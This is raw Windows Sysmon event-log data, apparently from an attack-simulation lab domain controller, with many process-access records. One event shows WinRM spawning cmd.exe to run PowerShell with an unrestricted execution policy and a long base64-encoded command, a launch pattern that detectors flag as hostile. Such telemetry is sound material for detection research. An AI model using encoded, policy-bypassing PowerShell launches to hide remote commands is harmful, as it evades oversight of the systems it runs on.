13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004282Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004281Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004280Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004279Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004278Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004277Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-859F-5FCF-D400-000000009101}4360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004276Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004275Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-859F-5FCF-D200-000000009101}50004340C:\Windows\system32\WinrsHost.exe{10ACEC4A-859F-5FCF-D400-000000009101}4360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000004274Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.351{10ACEC4A-859F-5FCF-D400-000000009101}4360C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-859F-5FCF-CB41-080000000000}0x841cb0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-859F-5FCF-D200-000000009101}5000C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000004273Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.350{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004272Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.334{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004271Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.334{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004270Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.334{10ACEC4A-8541-5FCF-1500-000000009101}13642020C:\Windows\system32\svchost.exe{10ACEC4A-859F-5FCF-D200-000000009101}5000C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000004269Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.334{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-859F-5FCF-D200-000000009101}5000C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004268Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.318{10ACEC4A-859F-5FCF-D300-000000009101}50044516C:\Windows\system32\conhost.exe{10ACEC4A-859F-5FCF-D200-000000009101}5000C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004267Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.318{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-859F-5FCF-D300-000000009101}5004C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004266Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.318{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004265Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.318{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004264Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:39.303{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004263Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 